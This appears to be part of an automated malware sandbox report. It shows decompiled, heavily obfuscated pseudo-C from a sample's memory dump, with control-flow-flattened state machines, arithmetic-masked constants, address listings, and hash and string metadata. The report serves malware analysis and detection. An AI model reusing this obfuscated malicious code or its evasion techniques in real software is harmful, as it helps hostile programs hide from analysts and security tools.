				_v156 = _v156 << 0xa;
				_v156 = _v156 ^ 0x91e5be42;
				_v156 = _v156 | 0xf592e812;
				_v156 = _v156 ^ 0xf5fb9c3d;
				_v60 = 0xbf5e;
				_v60 = _v60 >> 7;
				_v60 = _v60 ^ 0x00001130;
				_v112 = 0x687f;
				_v112 = _v112 | 0xf46ca00f;
				_t421 = 0x35;
				_v112 = _v112 * 0x78;
				_v112 = _v112 ^ 0x930cd2b7;
				_v152 = 0xc857;
				_v152 = _v152 << 5;
				_v152 = _v152 | 0x37c6acdc;
				_v152 = _v152 + 0xffffd100;
				_v152 = _v152 ^ 0x37df0477;
				_v144 = 0xf477;
				_v144 = _v144 >> 2;
				_v144 = _v144 << 5;
				_v144 = _v144 | 0xf3531cc7;
				_v144 = _v144 ^ 0xf357d736;
				_v120 = 0xcb9;
				_v120 = _v120 + 0xe3f9;
				_v120 = _v120 ^ 0x6ced8dd9;
				_v120 = _v120 ^ 0x6ced4b8c;
				_v20 = 0x5e2b;
				_v20 = _v20 + 0xffff1e4f;
				_v20 = _v20 ^ 0xffff4ba5;
				_v124 = 0x4b0e;
				_v124 = _v124 / _t421;
				_t422 = 0x44;
				_v124 = _v124 / _t422;
				_v124 = _v124 ^ 0x00000f50;
				_v92 = 0x1f74;
				_v92 = _v92 + 0xffffb151;
				_v92 = _v92 ^ 0xde981c2c;
				_v92 = _v92 ^ 0x2167c13f;
				_v48 = 0x349e;
				_v48 = _v48 | 0xa536c816;
				_v48 = _v48 ^ 0xa536ef12;
				_v172 = 0xab81;
				_t423 = 0x46;
				_v172 = _v172 * 0x33;
				_v172 = _v172 + 0xffff1acb;
				_v172 = _v172 ^ 0xbb3feb59;
				_v172 = _v172 ^ 0xbb1e804f;
				_v72 = 0x6207;
				_v72 = _v72 + 0xffff8a84;
				_v72 = _v72 ^ 0xffffdea5;
				_v80 = 0xb702;
				_v80 = _v80 * 0x71;
				_v80 = _v80 + 0xffff1180;
				_v80 = _v80 ^ 0x004fd1d8;
				_v40 = 0x81cb;
				_v40 = _v40 * 0x24;
				_v40 = _v40 ^ 0x001275f3;
				_v88 = 0x5eb0;
				_v88 = _v88 >> 3;
				_v88 = _v88 + 0x92b4;
				_v88 = _v88 ^ 0x0000b644;
				_v160 = 0x12e7;
				_v160 = _v160 ^ 0x069a79b3;
				_v160 = _v160 / _t423;
				_v160 = _v160 << 0xd;
				_v160 = _v160 ^ 0x04c33b64;
				_v84 = 0xf1f4;
				_v84 = _v84 | 0x342cde3b;
				_t424 = 0x1c;
				_v84 = _v84 / _t424;
				_v84 = _v84 ^ 0x01dd3282;
				_v116 = 0xb146;
				_t425 = 0x4f;
				_v116 = _v116 * 0x6c;
				_v116 = _v116 + 0xbfc7;
				_v116 = _v116 ^ 0x004bdc24;
				_v76 = 0x885c;
				_v76 = _v76 >> 3;
				_v76 = _v76 ^ 0x00003fd1;
				_v56 = 0xb3ed;
				_v56 = _v56 + 0xffff0d01;
				_v56 = _v56 ^ 0xffffed6a;
				_v108 = 0xc622;
				_v108 = _v108 | 0x10712732;
				_v108 = _v108 ^ 0x74f95923;
				_v108 = _v108 ^ 0x648892da;
				_v128 = 0x5bd2;
				_v128 = _v128 + 0x6edf;
				_v128 = _v128 >> 2;
				_v128 = _v128 ^ 0x00004896;
				_v164 = 0xe1b;
				_v164 = _v164 / _t425;
				_v164 = _v164 + 0xf341;
				_v164 = _v164 >> 0xb;
				_v164 = _v164 ^ 0x00001a6d;
				_v104 = 0x25ae;
				_v104 = _v104 ^ 0xe14689b4;
				_v104 = _v104 ^ 0x501c8677;
				_v104 = _v104 ^ 0xb15a3e2e;
				_v100 = 0xf2b8;
				_v100 = _v100 >> 4;
				_v100 = _v100 + 0x7f8b;
				_v100 = _v100 ^ 0x0000c2a8;
				_v64 = 0x78fc;
				_t426 = 0x2a;
				_v64 = _v64 / _t426;
				_v64 = _v64 ^ 0x000003c6;
				_v28 = 0x315;
				_v28 = _v28 | 0x8467cf1c;
				_v28 = _v28 ^ 0x84678c6c;
				_v36 = 0x48e3;
				_v36 = _v36 << 0x10;
				_v36 = _v36 ^ 0x48e34564;
				_v140 = 0xd9da;
				_v140 = _v140 ^ 0xccfa4b87;
				_v140 = _v140 >> 8;
				_v140 = _v140 + 0xb0ba;
				_v140 = _v140 ^ 0x00cde1b8;
				_v44 = 0xbd19;
				_v44 = _v44 >> 0xc;
				_v44 = _v44 ^ 0x000065c0;
				_v136 = 0xd203;
				_v136 = _v136 | 0x5349dfd2;
				_v136 = _v136 + 0xffffa76d;
				_v136 = _v136 ^ 0xc21cb162;
				_v136 = _v136 ^ 0x91553623;
				_v24 = 0x8da7;
				_v24 = _v24 + 0xffff55dc;
				_v24 = _v24 ^ 0xffffe382;
				_v68 = 0xcfb5;
				_t427 = 0x28;
				_v68 = _v68 / _t427;
				_v68 = _v68 ^ 0x00000530;
				_t428 = _v12;
				_t357 = _v132;
				while(1) {
					L1:
					while(1) {
						_t439 = _t431 - 0x28e290b2;
						if(_t439 > 0) {
							goto L18;
						}
						L3:
						if(_t439 == 0) {
							_t386 = _t379;
							_t365 = E006DA970(_t379, _v112, _v152, _v144,  &_v4, _v120, _t380, _t380, _a12, _v20, _t380, _v124, _t380,  &_v12, _t380, _t380, _v92);
							_t437 =  &(_t437[0xf]);
							if(_t365 == 0) {
								L24:
								_t431 = 0x1c1c4d3a;
								goto L11;
							} else {
								_t368 = E006D8C8F(_t386);
								_t431 = 0x30519b83;
								_t357 = _v12 * 0x2c + _t379;
								_v132 = _t357;
								_t428 =  >=  ? _t379 : (_t368 & 0x0000001f) * 0x2c + _t379;
								goto L12;
							}
							L34:
						} else {
							if(_t431 == _t413) {
								E006D94DB(_v160, _v84, _t435,  &_v8, _v116, _v136, _v16, _v76);
								_t431 =  !=  ? 0x33392e52 : 0x221cfa57;
								_t357 = E006C5FB2(_v56, _v108, _v16);
								_t437 =  &(_t437[8]);
								L29:
								_t380 = _v148;
								_t413 = 0x10c975df;
								goto L30;
							} else {
								if(_t431 == 0x1c1c4d3a) {
									E006CF536(_v100, _v64, _v28, _t435);
									_t431 = 0x205a5796;
									goto L11;
								} else {
									if(_t431 == 0x205a5796) {
										return E006CF536(_v36, _v140, _v44, _t379);
									}
									if(_t431 == 0x221cfa57) {
										_t428 = _t428 + 0x2c;
										asm("sbb esi, esi");
										_t431 = (_t431 & 0x14354e49) + 0x1c1c4d3a;
										continue;
									} else {
										if(_t431 != 0x2413af03) {
											L30:
											if(_t431 != 0x1b07e5ae) {
												_t357 = _v132;
												while(1) {
													_t439 = _t431 - 0x28e290b2;
													if(_t439 > 0) {
														goto L18;
													}
													goto L3;
												}
												goto L18;
											}
										} else {
											_push(_t380);
											_push(_t380);
											_t357 = E006C8736(0x20000); // executed
											_t379 = _t357;
											if(_t379 != 0) {
												_t431 = 0x2c9da08a;
												L11:
												_t357 = _v132;
												L12:
												_t380 = _v148;
												goto L1;
											}
										}
									}
								}
							}
						}
						L33:
						return _t357;
						goto L34;
						L18:
						if(_t431 == 0x2c9da08a) {
							_push(_t380);
							_push(_t380);
							_t357 = E006C8736(0x2000);
							_t435 = _t357;
							if(_t357 == 0) {
								_t431 = 0x205a5796;
								goto L29;
							} else {
								_t431 = 0x28e290b2;
								goto L11;
							}
						} else {
							if(_t431 == 0x30519b83) {
								_t361 = E006CF65F(_v68, _v72, _v80, _v40,  *_t428, _a12, _v88);
								_t380 = _v148;
								_t437 =  &(_t437[5]);
								_v16 = _t361;
								_t357 = _v132;
								_t413 = 0x10c975df;
								_t431 =  !=  ? 0x10c975df : 0x221cfa57;
								continue;
							} else {
								if(_t431 == 0x33392e52) {
									E006D7830(_v128, _t380, _t435, _v164, _v104, _v24);
									_t437 =  &(_t437[4]);
									goto L24;
								} else {
									if(_t431 != 0x3b64c246) {
										goto L30;
									} else {
										_t431 = 0x2413af03;
										continue;
									}
								}
							}
						}
						goto L33;
					}
				}
			}

































































                                          0x006d42da
                                          0x006d42e4
                                          0x006d42eb
                                          0x006d42ef
                                          0x006d42f6
                                          0x006d42fd
                                          0x006d4304
                                          0x006d4305
                                          0x006d4306
                                          0x006d430b
                                          0x006d4316
                                          0x006d4319
                                          0x006d4323
                                          0x006d432e
                                          0x006d4330
                                          0x006d4338
                                          0x006d433d
                                          0x006d4342
                                          0x006d4344
                                          0x006d4348
                                          0x006d434d
                                          0x006d4355
                                          0x006d435d
                                          0x006d4365
                                          0x006d436a
                                          0x006d4372
                                          0x006d437d
                                          0x006d4388
                                          0x006d4393
                                          0x006d439b
                                          0x006d43a0
                                          0x006d43a8
                                          0x006d43b0
                                          0x006d43b8
                                          0x006d43c3
                                          0x006d43cb
                                          0x006d43d6
                                          0x006d43de
                                          0x006d43ed
                                          0x006d43f0
                                          0x006d43f4
                                          0x006d43fc
                                          0x006d4404
                                          0x006d4409
                                          0x006d4411
                                          0x006d4419
                                          0x006d4421
                                          0x006d4429
                                          0x006d442e
                                          0x006d4433
                                          0x006d443b
                                          0x006d4443
                                          0x006d444b
                                          0x006d4453
                                          0x006d445b
                                          0x006d4463
                                          0x006d446e
                                          0x006d4479
                                          0x006d4484
                                          0x006d4494
                                          0x006d449c
                                          0x006d449f
                                          0x006d44a3
                                          0x006d44ab
                                          0x006d44b3
                                          0x006d44bb
                                          0x006d44c3
                                          0x006d44cb
                                          0x006d44d6
                                          0x006d44e1
                                          0x006d44ee
                                          0x006d44fd
                                          0x006d4500
                                          0x006d4504
                                          0x006d450c
                                          0x006d4514
                                          0x006d451c
                                          0x006d4524
                                          0x006d452c
                                          0x006d4534
                                          0x006d4541
                                          0x006d4545
                                          0x006d454d
                                          0x006d4555
                                          0x006d4568
                                          0x006d456f
                                          0x006d457a
                                          0x006d4582
                                          0x006d4587
                                          0x006d458f
                                          0x006d4597
                                          0x006d459f
                                          0x006d45af
                                          0x006d45b3
                                          0x006d45b8
                                          0x006d45c0
                                          0x006d45c8
                                          0x006d45d4
                                          0x006d45d9
                                          0x006d45df
                                          0x006d45e7
                                          0x006d45f4
                                          0x006d45f5
                                          0x006d45f9
                                          0x006d4601
                                          0x006d4609
                                          0x006d4611
                                          0x006d4616
                                          0x006d461e
                                          0x006d4629
                                          0x006d4634
                                          0x006d463f
                                          0x006d4647
                                          0x006d464f
                                          0x006d4657
                                          0x006d465f
                                          0x006d4667
                                          0x006d466f
                                          0x006d4674
                                          0x006d467c
                                          0x006d468a
                                          0x006d468e
                                          0x006d4696
                                          0x006d469b
                                          0x006d46a3
                                          0x006d46ab
                                          0x006d46b3
                                          0x006d46bb
                                          0x006d46c3
                                          0x006d46cb
                                          0x006d46d0
                                          0x006d46d8
                                          0x006d46e0
                                          0x006d46f0
                                          0x006d46f5
                                          0x006d46fe
                                          0x006d4709
                                          0x006d4714
                                          0x006d471f
                                          0x006d472a
                                          0x006d4735
                                          0x006d473d
                                          0x006d4748
                                          0x006d4750
                                          0x006d4758
                                          0x006d475d
                                          0x006d4765
                                          0x006d476d
                                          0x006d4778
                                          0x006d4780
                                          0x006d478b
                                          0x006d4793
                                          0x006d479b
                                          0x006d47a3
                                          0x006d47ab
                                          0x006d47b3
                                          0x006d47be
                                          0x006d47c9
                                          0x006d47d4
                                          0x006d47e0
                                          0x006d47e3
                                          0x006d47e7
                                          0x006d47ef
                                          0x006d47f6
                                          0x006d47fa
                                          0x006d47fa
                                          0x006d47ff
                                          0x006d47ff
                                          0x006d4805
                                          0x00000000
                                          0x00000000
                                          0x006d480b
                                          0x006d480b
                                          0x006d4939
                                          0x006d494b
                                          0x006d4950
                                          0x006d4955
                                          0x006d49e0
                                          0x006d49e0
                                          0x00000000
                                          0x006d495b
                                          0x006d4966
                                          0x006d496e
                                          0x006d4980
                                          0x006d4984
                                          0x006d4988
                                          0x00000000
                                          0x006d4988
                                          0x00000000
                                          0x006d4811
                                          0x006d4813
                                          0x006d48d7
                                          0x006d48fa
                                          0x006d48fd
                                          0x006d4902
                                          0x006d4a70
                                          0x006d4a70
                                          0x006d4a74
                                          0x00000000
                                          0x006d4819
                                          0x006d481f
                                          0x006d48a2
                                          0x006d48a9
                                          0x00000000
                                          0x006d4821
                                          0x006d4827
                                          0x00000000
                                          0x006d4aa3
                                          0x006d4833
                                          0x006d4877
                                          0x006d487c
                                          0x006d4884
                                          0x00000000
                                          0x006d4835
                                          0x006d483b
                                          0x006d4a79
                                          0x006d4a7f
                                          0x006d4a81
                                          0x006d47ff
                                          0x006d47ff
                                          0x006d4805
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x006d4805
                                          0x00000000
                                          0x006d47ff
                                          0x006d4841
                                          0x006d4850
                                          0x006d4851
                                          0x006d4857
                                          0x006d485c
                                          0x006d4862
                                          0x006d4868
                                          0x006d486d
                                          0x006d486d
                                          0x006d4871
                                          0x006d4871
                                          0x00000000
                                          0x006d4871
                                          0x006d4862
                                          0x006d483b
                                          0x006d4833
                                          0x006d481f
                                          0x006d4813
                                          0x006d4aae
                                          0x006d4aae
                                          0x00000000
                                          0x006d4990
                                          0x006d4996
                                          0x006d4a4d
                                          0x006d4a4e
                                          0x006d4a54
                                          0x006d4a59
                                          0x006d4a5f
                                          0x006d4a6b
                                          0x00000000
                                          0x006d4a61
                                          0x006d4a61
                                          0x00000000
                                          0x006d4a61
                                          0x006d499c
                                          0x006d49a2
                                          0x006d4a10
                                          0x006d4a15
                                          0x006d4a19
                                          0x006d4a1e
                                          0x006d4a25
                                          0x006d4a2e
                                          0x006d4a33
                                          0x00000000
                                          0x006d49a4
                                          0x006d49aa
                                          0x006d49d8
                                          0x006d49dd
                                          0x00000000
                                          0x006d49ac
                                          0x006d49b2
                                          0x00000000
                                          0x006d49b8
                                          0x006d49b8
                                          0x00000000
                                          0x006d49b8
                                          0x006d49b2
                                          0x006d49aa
                                          0x006d49a2
                                          0x00000000
                                          0x006d4996
                                          0x006d47ff

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: +^$R.93$R.93$RESCDIR$dEH$l)
                                          • API String ID: 0-1973027218
                                          • Opcode ID: 6dae183150793ffe9c3d1d0d0277e954d08126b822ad90e5e8a4cc44d4105b4e
                                          • Instruction ID: aad4cc4320219f64496899540c9b52d88c3581f3ef7847782416485997012bb2
                                          • Opcode Fuzzy Hash: 6dae183150793ffe9c3d1d0d0277e954d08126b822ad90e5e8a4cc44d4105b4e
                                          • Instruction Fuzzy Hash: 960234719083819FE3A8CF25C48AA5BFBE2FBC4354F10891DE5D996260DBB58949CF43
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 006D02C3, Relevance: 7.7, Strings: 6, Instructions: 248COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 96%
                                          			E006D02C3() {
				char _v524;
				intOrPtr _v548;
				char _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				signed int _v676;
				signed int _t245;
				signed int _t247;
				void* _t249;
				signed int _t254;
				void* _t255;
				intOrPtr _t256;
				signed int _t258;
				signed int _t259;
				signed int _t260;
				signed int _t261;
				signed int _t262;
				signed int _t263;
				signed int _t264;
				signed int _t265;
				signed int _t266;
				signed int _t267;
				signed int _t290;
				void* _t293;
				void* _t298;
				signed int* _t300;

				_t300 =  &_v676;
				_v580 = 0x66ae1;
				_v576 = 0xbd1a2;
				_v572 = 0x272c23;
				_t258 = 0x33;
				_t256 = 0;
				_t293 = 0x3b419076;
				_v568 = 0;
				_v640 = 0x1372;
				_v640 = _v640 / _t258;
				_v640 = _v640 | 0x4a3401ed;
				_v640 = _v640 ^ 0x4a34016d;
				_v660 = 0x5e98;
				_v660 = _v660 >> 0xe;
				_v660 = _v660 | 0x7267fa90;
				_t259 = 0x75;
				_v660 = _v660 / _t259;
				_v660 = _v660 ^ 0x00fa5318;
				_v652 = 0x5e75;
				_v652 = _v652 << 0x10;
				_v652 = _v652 + 0x48dc;
				_t260 = 0x18;
				_v652 = _v652 / _t260;
				_v652 = _v652 ^ 0x03efb4d1;
				_v608 = 0xe223;
				_t261 = 0x3f;
				_v608 = _v608 / _t261;
				_v608 = _v608 ^ 0x000070cc;
				_v656 = 0xb48f;
				_v656 = _v656 >> 6;
				_t262 = 0x3a;
				_v656 = _v656 / _t262;
				_v656 = _v656 + 0xde3a;
				_v656 = _v656 ^ 0x0000cbaf;
				_v612 = 0x15cc;
				_v612 = _v612 ^ 0x9ca6d169;
				_v612 = _v612 ^ 0x9ca6af9c;
				_v668 = 0xa8de;
				_v668 = _v668 << 5;
				_v668 = _v668 + 0xffff49ed;
				_t263 = 0x34;
				_v668 = _v668 / _t263;
				_v668 = _v668 ^ 0x00000193;
				_v596 = 0xe25b;
				_v596 = _v596 >> 4;
				_v596 = _v596 ^ 0x000030c3;
				_v636 = 0xc7ea;
				_v636 = _v636 << 0xa;
				_v636 = _v636 | 0x82c54243;
				_v636 = _v636 ^ 0x83dfaf9b;
				_v620 = 0x2a3e;
				_v620 = _v620 + 0xffff612f;
				_v620 = _v620 ^ 0xffffe842;
				_v644 = 0x52e;
				_t264 = 0x44;
				_v644 = _v644 * 0x2b;
				_v644 = _v644 + 0x1b45;
				_v644 = _v644 ^ 0x0000a38b;
				_v664 = 0x7c05;
				_v664 = _v664 / _t264;
				_v664 = _v664 + 0xfffff3de;
				_t265 = 0xd;
				_v664 = _v664 * 0x41;
				_v664 = _v664 ^ 0xfffd1fed;
				_v672 = 0x7153;
				_v672 = _v672 * 0x55;
				_v672 = _v672 + 0xffff3073;
				_v672 = _v672 | 0x19b2f735;
				_v672 = _v672 ^ 0x19b69e67;
				_v624 = 0x6a46;
				_v624 = _v624 << 6;
				_v624 = _v624 ^ 0x001a8e62;
				_v676 = 0x6586;
				_v676 = _v676 | 0x5a6bf539;
				_v676 = _v676 / _t265;
				_v676 = _v676 << 0xf;
				_v676 = _v676 ^ 0x4e5fab63;
				_v632 = 0x1a9f;
				_v632 = _v632 + 0x62a3;
				_v632 = _v632 ^ 0x000002a8;
				_v616 = 0x8464;
				_v616 = _v616 | 0x13bf265e;
				_v616 = _v616 ^ 0x13bfdd6d;
				_v592 = 0xbadb;
				_t266 = 0x3d;
				_t292 = _v632;
				_v592 = _v592 * 0x69;
				_v592 = _v592 ^ 0x004cce95;
				_v604 = 0xca90;
				_v604 = _v604 >> 0xc;
				_v604 = _v604 ^ 0x00007684;
				_v648 = 0x358b;
				_v648 = _v648 << 1;
				_v648 = _v648 << 9;
				_v648 = _v648 / _t266;
				_v648 = _v648 ^ 0x0003f328;
				_v600 = 0xe7dd;
				_v600 = _v600 ^ 0xaf509c9e;
				_v600 = _v600 ^ 0xaf5010b9;
				_v628 = 0xd224;
				_t245 = _v628;
				_t267 = 0x19;
				_t290 = _t245 % _t267;
				_v628 = _t245 / _t267;
				_v628 = _v628 ^ 0x00000864;
				do {
					while(_t293 != 0x47bbe06) {
						if(_t293 == 0xa25cde4) {
							_t249 = E006CF46D();
							_t298 = _v588 - _v548;
							asm("sbb ecx, [esp+0x94]");
							__eflags = _v584 - _t290;
							if(__eflags >= 0) {
								if(__eflags > 0) {
									L19:
									_t256 = 1;
									__eflags = 1;
								} else {
									__eflags = _t298 - _t249;
									if(_t298 >= _t249) {
										goto L19;
									}
								}
							}
						} else {
							if(_t293 == 0x13363d5d) {
								_t290 = _v604;
								_t267 = _v592;
								E006DAAAE(_t267, _t290, _v648,  &_v588, _v600);
								_t300 =  &(_t300[3]);
								_t293 = 0xa25cde4;
								continue;
							} else {
								if(_t293 == 0x1fdc46de) {
									_t290 = _v660;
									_t254 = E006CB566(_t267, _t290, _v656, _v612, _v640, _v668, _t267, _v596, _v636, _t256, _v620, _v644, _v628,  &_v524); // executed
									_t292 = _t254;
									_t300 =  &(_t300[0xc]);
									__eflags = _t254 - 0xffffffff;
									if(__eflags != 0) {
										_t293 = 0x47bbe06;
										continue;
									}
								} else {
									if(_t293 == 0x350fffd6) {
										_t290 =  &_v524;
										_t255 = E006D3E3F(_t267, _t290, __eflags, _v652, _v608);
										_pop(_t267);
										__eflags = _t255;
										if(__eflags != 0) {
											_t293 = 0x1fdc46de;
											continue;
										}
									} else {
										if(_t293 != 0x3b419076) {
											goto L14;
										} else {
											_t293 = 0x350fffd6;
											continue;
										}
									}
								}
							}
						}
						L20:
						return _t256;
					}
					_push(_t267);
					_t247 = E006C7F83( &_v564, _v664, _v672, _v624, _t292, _t267, _v676);
					_t290 = _v616;
					_t267 = _v632;
					asm("sbb esi, esi");
					_t293 = ( ~_t247 & 0xe3709c53) + 0x2fc5a10a; // executed
					__eflags = _t293;
					E006D4F7D(_t267, _t290, _t292); // executed
					_t300 =  &(_t300[7]);
					L14:
					__eflags = _t293 - 0x2fc5a10a;
				} while (__eflags != 0);
				goto L20;
			}






















































                                          0x006d02c3
                                          0x006d02c9
                                          0x006d02d3
                                          0x006d02db
                                          0x006d02e9
                                          0x006d02ea
                                          0x006d02ec
                                          0x006d02f1
                                          0x006d02f5
                                          0x006d0305
                                          0x006d030b
                                          0x006d0313
                                          0x006d031b
                                          0x006d0323
                                          0x006d0328
                                          0x006d0334
                                          0x006d0339
                                          0x006d033f
                                          0x006d0347
                                          0x006d034f
                                          0x006d0354
                                          0x006d0360
                                          0x006d0365
                                          0x006d036b
                                          0x006d0373
                                          0x006d037f
                                          0x006d0384
                                          0x006d038a
                                          0x006d0392
                                          0x006d039a
                                          0x006d03a3
                                          0x006d03a8
                                          0x006d03ae
                                          0x006d03b6
                                          0x006d03be
                                          0x006d03c6
                                          0x006d03ce
                                          0x006d03d6
                                          0x006d03de
                                          0x006d03e3
                                          0x006d03ef
                                          0x006d03f2
                                          0x006d03f6
                                          0x006d03fe
                                          0x006d0406
                                          0x006d040b
                                          0x006d0413
                                          0x006d041b
                                          0x006d0420
                                          0x006d0428
                                          0x006d0430
                                          0x006d0438
                                          0x006d0440
                                          0x006d0448
                                          0x006d0459
                                          0x006d0461
                                          0x006d0465
                                          0x006d046d
                                          0x006d0475
                                          0x006d0485
                                          0x006d0489
                                          0x006d0496
                                          0x006d0499
                                          0x006d049d
                                          0x006d04a5
                                          0x006d04b2
                                          0x006d04b6
                                          0x006d04be
                                          0x006d04c6
                                          0x006d04ce
                                          0x006d04d6
                                          0x006d04db
                                          0x006d04e3
                                          0x006d04eb
                                          0x006d04fb
                                          0x006d04ff
                                          0x006d0504
                                          0x006d050c
                                          0x006d0514
                                          0x006d051c
                                          0x006d0524
                                          0x006d052c
                                          0x006d0534
                                          0x006d053c
                                          0x006d0549
                                          0x006d054c
                                          0x006d0550
                                          0x006d0554
                                          0x006d055c
                                          0x006d0564
                                          0x006d0569
                                          0x006d0571
                                          0x006d0579
                                          0x006d057d
                                          0x006d058a
                                          0x006d058e
                                          0x006d0596
                                          0x006d059e
                                          0x006d05a6
                                          0x006d05ae
                                          0x006d05b6
                                          0x006d05ba
                                          0x006d05bb
                                          0x006d05bd
                                          0x006d05c1
                                          0x006d05c9
                                          0x006d05c9
                                          0x006d05d7
                                          0x006d06f4
                                          0x006d06fd
                                          0x006d0708
                                          0x006d070f
                                          0x006d0711
                                          0x006d0713
                                          0x006d0719
                                          0x006d071b
                                          0x006d071b
                                          0x006d0715
                                          0x006d0715
                                          0x006d0717
                                          0x00000000
                                          0x00000000
                                          0x006d0717
                                          0x006d0713
                                          0x006d05dd
                                          0x006d05e3
                                          0x006d068a
                                          0x006d068e
                                          0x006d0692
                                          0x006d0697
                                          0x006d069a
                                          0x00000000
                                          0x006d05e9
                                          0x006d05ef
                                          0x006d065f
                                          0x006d0663
                                          0x006d0668
                                          0x006d066a
                                          0x006d066d
                                          0x006d0670
                                          0x006d0676
                                          0x00000000
                                          0x006d0676
                                          0x006d05f1
                                          0x006d05f7
                                          0x006d0610
                                          0x006d061b
                                          0x006d0621
                                          0x006d0622
                                          0x006d0624
                                          0x006d062a
                                          0x00000000
                                          0x006d062a
                                          0x006d05f9
                                          0x006d05ff
                                          0x00000000
                                          0x006d0605
                                          0x006d0605
                                          0x00000000
                                          0x006d0605
                                          0x006d05ff
                                          0x006d05f7
                                          0x006d05ef
                                          0x006d05e3
                                          0x006d071f
                                          0x006d0728
                                          0x006d0728
                                          0x006d06a4
                                          0x006d06be
                                          0x006d06c3
                                          0x006d06c9
                                          0x006d06d0
                                          0x006d06d8
                                          0x006d06d8
                                          0x006d06de
                                          0x006d06e3
                                          0x006d06e6
                                          0x006d06e6
                                          0x006d06e6
                                          0x00000000

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: #,'$#$Fj$Sq$[$u^
                                          • API String ID: 0-3347335214
                                          • Opcode ID: c47c2e617af9f90d504ce4957d9b81ea9ce1d44935f169193b34d947923a3a8b
                                          • Instruction ID: 28b991ba3b30d8ac39a0699839827a17a2ce61da6ca9e6b18e4e481cf417d283
                                          • Opcode Fuzzy Hash: c47c2e617af9f90d504ce4957d9b81ea9ce1d44935f169193b34d947923a3a8b
                                          • Instruction Fuzzy Hash: 09B164729083819FE358CF64C98954BFBE2FBC5758F008A1EF085562A0D7B59A09CF47
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 006CEE78, Relevance: 5.2, Strings: 4, Instructions: 203COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 95%
                                          			E006CEE78() {
				char _v520;
				char _v1040;
				intOrPtr _v1044;
				intOrPtr _v1048;
				intOrPtr _v1052;
				intOrPtr _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				void* _t204;
				void* _t216;
				void* _t218;
				intOrPtr _t242;
				intOrPtr _t248;
				signed int _t249;
				signed int _t250;
				signed int _t251;
				signed int _t252;
				signed int _t253;
				signed int _t254;
				signed int* _t257;

				_t257 =  &_v1124;
				_v1056 = 0x181c5d;
				_v1052 = 0x367784;
				_t216 = 0x1144238d;
				_v1048 = 0x4ffcf6;
				_t248 = 0;
				_v1044 = 0;
				_v1088 = 0xda27;
				_t249 = 0x62;
				_v1088 = _v1088 * 0x3a;
				_t250 = 0x7a;
				_v1088 = _v1088 / _t249;
				_v1088 = _v1088 ^ 0x0000d2a1;
				_v1112 = 0x1719;
				_v1112 = _v1112 << 7;
				_v1112 = _v1112 + 0xffff2bf1;
				_v1112 = _v1112 | 0x98c770ba;
				_v1112 = _v1112 ^ 0x98cfba04;
				_v1096 = 0xeee5;
				_v1096 = _v1096 ^ 0xe08a058d;
				_v1096 = _v1096 | 0xf31efd60;
				_v1096 = _v1096 >> 0xd;
				_v1096 = _v1096 ^ 0x00079e87;
				_v1068 = 0x925f;
				_v1068 = _v1068 + 0xa627;
				_v1068 = _v1068 * 0xc;
				_v1068 = _v1068 ^ 0x000ee055;
				_v1076 = 0x1457;
				_v1076 = _v1076 * 0x3c;
				_t251 = 0x32;
				_v1076 = _v1076 / _t250;
				_v1076 = _v1076 ^ 0x00007f2a;
				_v1064 = 0x70c;
				_v1064 = _v1064 * 3;
				_v1064 = _v1064 ^ 0x000033a7;
				_v1080 = 0xbf13;
				_v1080 = _v1080 >> 0xf;
				_v1080 = _v1080 | 0xa6e1d279;
				_v1080 = _v1080 ^ 0xa6e18774;
				_v1072 = 0x855;
				_v1072 = _v1072 >> 6;
				_v1072 = _v1072 * 0x6d;
				_v1072 = _v1072 ^ 0x00004ced;
				_v1060 = 0x8e6f;
				_v1060 = _v1060 + 0xe76;
				_v1060 = _v1060 ^ 0x0000eeed;
				_v1116 = 0x7f13;
				_v1116 = _v1116 + 0x7bf9;
				_v1116 = _v1116 + 0xffffe522;
				_v1116 = _v1116 + 0x76b9;
				_v1116 = _v1116 ^ 0x000120a7;
				_v1124 = 0x4a8d;
				_v1124 = _v1124 + 0xb0fa;
				_t252 = 0x18;
				_v1124 = _v1124 / _t251;
				_v1124 = _v1124 ^ 0xe1689f92;
				_v1124 = _v1124 ^ 0xe168b829;
				_v1104 = 0x6fdc;
				_v1104 = _v1104 / _t252;
				_v1104 = _v1104 ^ 0xd1a01b12;
				_v1104 = _v1104 >> 0xd;
				_v1104 = _v1104 ^ 0x0006b7bc;
				_v1120 = 0x3441;
				_v1120 = _v1120 << 2;
				_v1120 = _v1120 | 0xb521b1d3;
				_v1120 = _v1120 ^ 0x6f352f49;
				_v1120 = _v1120 ^ 0xda14a570;
				_v1092 = 0xdaef;
				_v1092 = _v1092 + 0xffffef8f;
				_v1092 = _v1092 | 0x558b4159;
				_v1092 = _v1092 >> 0xb;
